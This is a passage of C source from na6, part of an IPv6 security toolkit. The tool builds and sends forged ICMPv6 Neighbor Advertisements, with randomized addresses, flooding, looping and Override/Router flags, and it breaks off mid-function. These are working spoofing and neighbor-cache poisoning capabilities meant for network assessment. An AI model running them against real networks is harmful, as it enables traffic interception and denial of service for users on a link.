in6_addr *); int is_time_elapsed(struct timeval *, struct timeval *, unsigned long); int keyval(char *, unsigned int, char **, char **); int load_dst_and_pcap(struct iface_data *, unsigned int); unsigned int match_ether(struct ether_addr *, unsigned int, struct ether_addr *); unsigned int match_ipv6(struct in6_addr *, u_int8_t *, unsigned int, struct in6_addr *); int match_ipv6_to_prefixes(struct in6_addr *, struct prefix_list *); void print_filters(struct iface_data *, struct filters *); void print_filter_result(struct iface_data *, const u_char *, unsigned char); int print_local_addrs(struct iface_data *); void randomize_ether_addr(struct ether_addr *); void randomize_ipv6_addr(struct in6_addr *, struct in6_addr *, u_int8_t); int read_ipv6_address(char *, unsigned int, struct in6_addr *); int read_prefix(char *, unsigned int, char **); void release_privileges(void); void sanitize_ipv4_prefix(struct prefix4_entry *); void sanitize_ipv6_prefix(struct in6_addr *, u_int8_t); int send_neighbor_advert(struct iface_data *, pcap_t *, const u_char *); int send_neighbor_solicit(struct iface_data *, struct in6_addr *); int sel_src_addr(struct iface_data *); struct in6_addr * sel_src_addr_ra(struct iface_data *, struct in6_addr *); int sel_next_hop(struct iface_data *); int sel_next_hop_ra(struct iface_data *); void sig_alarm(int); struct in6_addr solicited_node(const struct in6_addr *); int string_escapes(char *, unsigned int *, unsigned int); size_t Strnlen(const char *, size_t); ipv6toolkit-1.5.1/tools/na6.c000066400000000000000000001342051223702747200160130ustar00rootroot00000000000000/* * na6: A security assessment tool for attack vectors based on * ICMPv6 Neighbor Advertisement messages * * Copyright (C) 2011-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make na6 * * The libpcap library must be previsously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "na6.h" #include "libipv6.h" #include "ipv6toolkit.h" /* Function prototypes */ void init_packet_data(struct iface_data *); int send_packet(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct in6_addr *pkt_ipv6addr; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; char all_nodes_addr[]= ALL_NODES_MULTICAST_ADDR; unsigned char buffer[65556]; unsigned char *v6buffer, *ptr, *startofprefixes; struct ip6_hdr *ipv6, *pkt_ipv6; struct nd_neighbor_advert *na; struct nd_neighbor_solicit *pkt_ns; struct ether_header *ethernet, *pkt_ether; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *pref, *rpref, *endptr; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int ntargets, sources, nsources, targets, nsleep; unsigned char targetpreflen; u_int16_t mask; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0, targetaddr_f=0; unsigned char listen_f = 0, multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char tllaopt_f=0, tllaopta_f=0, targetprefix_f=0, hoplimit_f=0; unsigned char newdata_f=0, floods_f=0; u_int32_t router_f=0, solicited_f=0, override_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize, max_packet_size; unsigned char *prev_nh, *startoffragment; struct filters filters; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; int r, sel; fd_set sset, rset; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"target", required_argument, 0, 't'}, {"router", no_argument, 0, 'r'}, {"solicited", no_argument, 0, 'c'}, {"override", no_argument, 0, 'o'}, {"target-addr-opt", required_argument, 0, 'E'}, {"add-target-opt", no_argument, 0, 'e'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"block-target-addr", required_argument, 0, 'w'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"accept-target-addr", required_argument, 0, 'W'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-targets", required_argument, 0, 'T'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:t:roceE:j:k:J:K:w:b:g:B:G:W:T:F:lz:vhL"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 't': /* NA Target address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Target Address not valid"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Target Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ targetpreflen = atoi(charptr); if(targetpreflen>128){ puts("Prefix length error in Target Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, targetpreflen); targetprefix_f=1; } break; case 'r': /* "Router" flag */ router_f = ND_NA_FLAG_ROUTER; break; case 'o': /* "Override" flag */ override_f = ND_NA_FLAG_OVERRIDE; break; case 'c': /* Solicited flag */ solicited_f = ND_NA_FLAG_SOLICITED; break; case 'E': /* Target link-layer option */ tllaopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } nlinkaddr++; tllaopta_f=1; break; case 'e': /* Add target link-layer option */ tllaopt_f = 1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'w': /* ND Target Address (block) filter */ if(filters.nblocktarget > MAX_BLOCK_TARGET){ puts("Too many Target Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in Target Address (block) filter number %u.\n", filters.nblocktarget+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocktarget[filters.nblocktarget])) <= 0){ printf("Error in Target Address (block) filter number %u.\n", filters.nblocktarget+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocktargetlen[filters.nblocktarget] = 128; } else{ filters.blocktargetlen[filters.nblocktarget] = atoi(charptr); if(filters.blocktargetlen[filters.nblocktarget]>128){ printf("Length error in Target Address (block) filter number %u.\n", filters.nblocktarget+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocktarget[filters.nblocktarget]), filters.blocktargetlen[filters.nblocktarget]); filters.nblocktarget++; break; case 'W': /* ND Target Address (accept) filter */ if(filters.naccepttarget >= MAX_ACCEPT_TARGET){ puts("Too many Target Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in Target Address (accept) filter number %u.\n", filters.naccepttarget+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.accepttarget[filters.naccepttarget])) <= 0){ printf("Error in Target Address (accept) filter number %u.\n", filters.naccepttarget+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.accepttargetlen[filters.naccepttarget] = 128; } else{ filters.accepttargetlen[filters.naccepttarget] = atoi(charptr); if(filters.accepttargetlen[filters.naccepttarget]>128){ printf("Length error in Target Address (accept) filter number %u.\n", \ filters.naccepttarget+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.accepttarget[filters.naccepttarget]), filters.accepttargetlen[filters.naccepttarget]); filters.naccepttarget++; filters.acceptfilters_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'T': /* Flood targets */ ntargets= atoi(optarg); if(ntargets == 0){ puts("Invalid number of Target Addresses in option -T"); exit(EXIT_FAILURE); } floodt_f= 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("na6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(listen_f && floodt_f){ puts("Error: 'listen' mode and 'flood targets' are incompatible"); exit(EXIT_FAILURE); } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); srandom(time(NULL)); if(!floods_f && !idata.srcaddr_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second highe-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<4;i++) idata.srcaddr.s6_addr16[i]=0x0000; for(i=4; i<8; i++) idata.srcaddr.s6_addr16[i]=random(); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) idata.srcaddr.s6_addr16[i]=0x0000; idata.srcpreflen=64; } if(!idata.dstaddr_f){ /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } } if(!idata.hsrcaddr_f) /* Source link-layer address is randomized by default */ for(i=0; i<6; i++) idata.hsrcaddr.a[i]= random(); if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(tllaopt_f && !tllaopta_f){ /* The value of the target link-layer address */ linkaddr[0] = idata.hsrcaddr; /* option defaults to the Ethernet Source Address */ nlinkaddr++; } /* If the flood target option ("-T") was specified, but no prefix was specified, select the random Target Addresses from the link-local unicast prefix (fe80::/64). */ if(floodt_f && !targetprefix_f){ targetaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) targetaddr.s6_addr16[i]=0x0000; targetpreflen=64; } if(!floods_f) nsources=1; if(!floodt_f) ntargets=1; if(!sleep_f) nsleep=1; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) idata.max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else idata.max_packet_size = idata.mtu; if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire a Neighbor Advertisement if a IPv6 Destination Address or an Ethernet * Destination Address were specified */ if((idata.dstaddr_f || idata.hdstaddr_f) && (targetaddr_f || floodt_f)){ if(send_packet(&idata, NULL, NULL) == FAILURE){ puts("Error while sending packet"); exit(EXIT_FAILURE); } if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending Neighbor Advertisements every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); if(send_packet(&idata, NULL, NULL) == FAILURE){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } exit(EXIT_SUCCESS); } } if(listen_f){ if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming ICMPv6 Neighbor Solicitation messages..."); } while(listen_f){ rset= sset; if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* Read a Neighbor Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ns = (struct nd_neighbor_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); accepted_f=0; if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Neighbor Advertisement */ if(send_packet(&idata, pkthdr, pktdata) == FAILURE){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } exit(EXIT_SUCCESS); } if(!((idata.dstaddr_f || idata.hdstaddr_f) && (targetaddr_f || floodt_f)) && !listen_f){ puts("Error: Nothing to send! (Destination Address or ND Target Address missing?)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->flags != IFACE_TUNNEL && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ETH_DATA_LEN)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare 